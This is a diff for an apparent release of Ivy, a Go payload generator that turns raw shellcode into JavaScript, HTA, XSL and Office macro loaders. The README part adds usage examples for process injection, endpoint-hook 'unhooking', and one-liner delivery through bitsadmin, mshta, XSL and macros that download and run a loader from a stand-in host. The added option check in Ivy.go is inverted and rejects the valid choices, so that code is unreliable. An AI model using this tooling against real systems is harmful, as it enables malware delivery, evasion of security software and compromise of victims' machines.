New upstream version 1.12

Cryptor/Cryptor.go

@@ -69,6 +69,7 @@ func randclassid() string {
 }
 
 func VarNumberLength(min, max int) string {
+	time.Sleep(2 * time.Millisecond)
 	var r string
 	rand.Seed(time.Now().UnixNano())
 	num := rand.Intn(max-min) + min
@@ -79,7 +80,6 @@ func VarNumberLength(min, max int) string {
 
 func StagelessArrayGen(data []byte) string {
 	var fmtStr string
-	//var StrSlice []string
 	aSlice := data
 	fmtStr = strings.Repeat("%d, ", len(aSlice)-1)
 	fmtStr += "%d"

Ivy.go

@@ -91,10 +91,12 @@ Their cries for mercy?
 	if opt.inputFile32 == "" && opt.inputFile64 == "" {
 		log.Fatal("Error: Please provide a path to a file containing a raw shellcode or  payload")
 	}
-
 	if opt.outFile == "" {
 		log.Fatal("Error: Please provide a name for the payload the you wish to generate")
 	}
+	if opt.CommandLoader == "" || opt.CommandLoader == "bits" || opt.CommandLoader == "hta" || opt.CommandLoader == "macro" || opt.CommandLoader == "xsl" {
+		log.Fatal("Error: Invalid delivery command option, please choose one of the acceptable options")
+	}
 	if opt.inputFile32 != "" && opt.stageless == false {
 		Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile32)
 		rawinputfile32 := Utils.Readfile(opt.inputFile32)

Loader/Loader.go

@@ -53,6 +53,7 @@ type macro struct {
 type sandbox struct {
 	Variables map[string]string
 }
+
 var buffer bytes.Buffer
 
 //First
@@ -71,7 +72,7 @@ func Java_Code_Buff(product string) (string, string, string, string, string, str
 	javacode.Variables["DecodedValue"] = Cryptor.VarNumberLength(4, 9)
 	javacode.Variables["shellcode"] = Cryptor.VarNumberLength(4, 9)
 	javacode.Variables["Auto_Open"] = Cryptor.VarNumberLength(4, 9)
-	
+
 	if product == "Excel" {
 		struct_option = Struct.Javacode_Start_Excel()
 	}
@@ -403,7 +404,7 @@ func XSL_Code_Buff(compiled string) string {
 	xsl.Variables = make(map[string]string)
 	xsl.Variables["payload"] = compiled
 	buffer.Reset()
-	xslTemplate, err := template.New("xsl").Parse(Struct.HTA_Loader())
+	xslTemplate, err := template.New("xsl").Parse(Struct.XSL_Loader())
 	if err != nil {
 		log.Fatal(err)
 	}

README.md

@@ -166,5 +166,77 @@ The delivery command line argument allows you to generate a command or string of
 * Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, then removed. 
 * XSL - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely.
 
+# Examples 
+
+### Staged Inject payload
+
+
+```
+./Ivy -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js
+```
+
+### Staged Local payload
+```
+./Ivy -Ix64 test64.c -Ix86 test32.c -P Local -O SampleLocal.js
+```
+
+### Stagless Local payload
+```
+./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O stageless.js
+```
+
+### Stagless Injected payload
+```
+./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O stageless.js
+```
+
+### Stagless Injected payload spawning notepad.exe
+```
+./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -process64 C:\\windows\\system32\\notepad.exe -process32 C:\\windows\\SysWOW64\\notepad.exe -O stageless.js
+```
+
+### Unhooked Stagless Local payload 
+```
+./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -unhook -O stageless.js
+```
+
+### Unhooked Stagless Injected payload
+```
+./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -unhook -O stageless.js
+```
+
+## One Liner Commands Samples
+
+### Non-Executable File Types
+
+```
+./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O test.png -stageless
+```
+
+### Bitsadmin Command
+
+```
+./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.js -url http://ACME.com -delivery bits -stageless
+```
+
+### MSHTA.exe Command
+
+```
+./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.hta -url http://ACME.com -delivery hta -stageless
+```
+
+
+### Stylesheet Payload
+```
+./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.xsl -url http://ACME.com -delivery xsl -stageless
+```
+
+
+### Macro Web Downloader
+
+```
+./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.txt -url http://ACME.com/test.txt -delivery macro -stageless
+```
+
 # Known Issues
 Currently there is a known issue with unhooking the remote injected process. A current work around is to load the [unhook](https://github.com/rsmudge/unhook-bof) BOF, for now.